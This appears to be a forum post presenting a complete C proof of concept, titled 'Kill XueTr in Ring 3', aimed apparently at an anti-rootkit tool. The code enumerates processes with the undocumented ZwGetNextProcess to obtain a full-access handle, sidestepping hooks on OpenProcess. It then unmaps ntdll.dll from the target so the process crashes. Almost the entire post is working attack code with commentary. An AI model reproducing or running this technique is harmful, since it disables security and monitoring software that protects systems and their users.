|
标题只是个噱头,主要是把FxOpenProcess转成了C代码,并作了适当精简。
本代码稍加修改可以编译成64位程序,不过觉得这么做没有意义而已。
在MiniFxOpenProcess中的bInheritHandle参数没有意义,加上只是为了和OpenProcess函数的形参兼容。
本POC仅支持Vista/Win7:它依赖 ntdll 导出的 ZwGetNextProcess,找不到该导出时 MiniFxOpenProcess 直接返回 0。
//Kill XueTr in Ring 3
//Author: Tesla.Angela
//Update: 2010-12-12
#include <stdio.h>
#include <windows.h>
// Function-pointer types for the APIs this POC resolves at run time with
// GetProcAddress instead of linking against them (ZwGetNextProcess and
// ZwUnmapViewOfSection are undocumented ntdll exports).
// ZwGetNextProcess: the code below passes (previous handle or 0, desired
// access, 0, 0, &out handle); the two zero arguments are presumably
// HandleAttributes and Flags — confirm against the native prototype.
// Return value is an NTSTATUS, held in a plain long (negative = failure).
typedef long (__stdcall *ZWGETNEXTPROCESS)(HANDLE,long,long,long,PHANDLE);
// ZwUnmapViewOfSection(ProcessHandle, BaseAddress) — NTSTATUS-returning.
typedef long (__stdcall *ZWUNMAPVIEWOFSECTION)(HANDLE,PVOID);
// GetProcessId(Process) — the Win32 function, fetched dynamically from kernel32.
typedef ULONG (__stdcall *GETPROCESSID)(HANDLE Process);
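/*
 * Open a process by PID without calling OpenProcess (which user-mode hooks
 * commonly intercept). Walks the system process list with the undocumented
 * ZwGetNextProcess, which hands back a handle with dwDesiredAccess for each
 * process in turn, and returns the first handle whose PID matches.
 *
 * dwDesiredAccess : access mask requested for every enumerated handle; a
 *                   process that cannot be opened with this mask is presumably
 *                   skipped by the kernel rather than reported — verify.
 * bInheritHandle  : ignored; present only for OpenProcess signature parity.
 * dwProcessId     : PID to look for. 0 is rejected, as OpenProcess rejects it.
 *
 * Returns the process handle (caller closes it) or NULL on failure: the
 * required exports are missing (pre-Vista), or no process has that PID.
 * Every other handle produced during the walk is closed before returning.
 */
HANDLE MiniFxOpenProcess(ULONG dwDesiredAccess, ULONG bInheritHandle, ULONG dwProcessId)
{
    HMODULE hNtdll = GetModuleHandleW(L"ntdll.dll");
    HMODULE hKernel32 = GetModuleHandleW(L"kernel32.dll");
    ZWGETNEXTPROCESS pfnGetNextProcess = NULL;
    GETPROCESSID pfnGetProcessId = NULL;
    HANDLE hCurrent = NULL, hNext = NULL;
    long Status;

    (void)bInheritHandle; /* kept for signature compatibility only */

    if (dwProcessId == 0 || hNtdll == NULL || hKernel32 == NULL) return NULL;

    pfnGetNextProcess = (ZWGETNEXTPROCESS)GetProcAddress(hNtdll, "ZwGetNextProcess");
    pfnGetProcessId = (GETPROCESSID)GetProcAddress(hKernel32, "GetProcessId");
    if (pfnGetNextProcess == NULL || pfnGetProcessId == NULL) return NULL;

    /* A NULL "previous" handle starts the walk at the first process. */
    Status = pfnGetNextProcess(NULL, dwDesiredAccess, 0, 0, &hNext);

    /* Stop on the first failing status (STATUS_NO_MORE_ENTRIES at the end of
     * the list) instead of testing the handle we just closed, as the original
     * loop did: if the call fails without writing hNext, the old loop reused a
     * closed handle value for one more iteration. */
    while (Status >= 0 && hNext != NULL) {
        hCurrent = hNext;
        hNext = NULL; /* so a failed call cannot leave a stale value behind */

        if (pfnGetProcessId(hCurrent) == dwProcessId) return hCurrent;

        Status = pfnGetNextProcess(hCurrent, dwDesiredAccess, 0, 0, &hNext);
        CloseHandle(hCurrent); /* not the one we want; release it */
    }

    /* Defensive: a failing status that still produced a handle would leak it. */
    if (hNext != NULL) CloseHandle(hNext);
    return NULL;
}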
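/*
 * Entry point: read a PID, obtain a PROCESS_ALL_ACCESS handle to it via
 * MiniFxOpenProcess, then unmap ntdll.dll from that process so it crashes
 * the next time it makes a system call. Returns 0 on success, 1 on any
 * failure (bad input, process not found, export missing, unmap rejected).
 */
int main(void)
{
    ULONG pid = 0;
    HANDLE hProc = NULL;
    HMODULE hNtdll = GetModuleHandleW(L"ntdll.dll");
    ZWUNMAPVIEWOFSECTION ZwUnmapViewOfSection = NULL;
    long Status;

    printf("Input PID: ");
    /* ULONG needs %lu, and an unparseable line must not leave pid = 0. */
    if (scanf("%lu", &pid) != 1 || pid == 0) {
        printf("Invalid PID\n");
        return 1;
    }

    hProc = MiniFxOpenProcess(PROCESS_ALL_ACCESS, 0, pid);
    printf("ProcessHandle: %p\n", hProc); /* %p: HANDLE is a pointer, not a long */
    if (hProc == NULL) {
        printf("Process not found or could not be opened\n");
        return 1;
    }

    if (hNtdll != NULL)
        ZwUnmapViewOfSection = (ZWUNMAPVIEWOFSECTION)GetProcAddress(hNtdll, "ZwUnmapViewOfSection");
    if (ZwUnmapViewOfSection == NULL) {
        printf("ZwUnmapViewOfSection not found\n");
        CloseHandle(hProc);
        return 1;
    }

    /* Passes our own ntdll base as the address to unmap in the target. This
     * only works if ntdll.dll sits at the same base in every process, which
     * the original POC relies on for Vista/Win7 — NOTE(review): confirm for
     * the target OS before depending on it. */
    Status = ZwUnmapViewOfSection(hProc, (PVOID)hNtdll);
    printf("ZwUnmapViewOfSection status: 0x%08lX\n", Status);

    CloseHandle(hProc);
    return Status >= 0 ? 0 : 1;
}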
|
|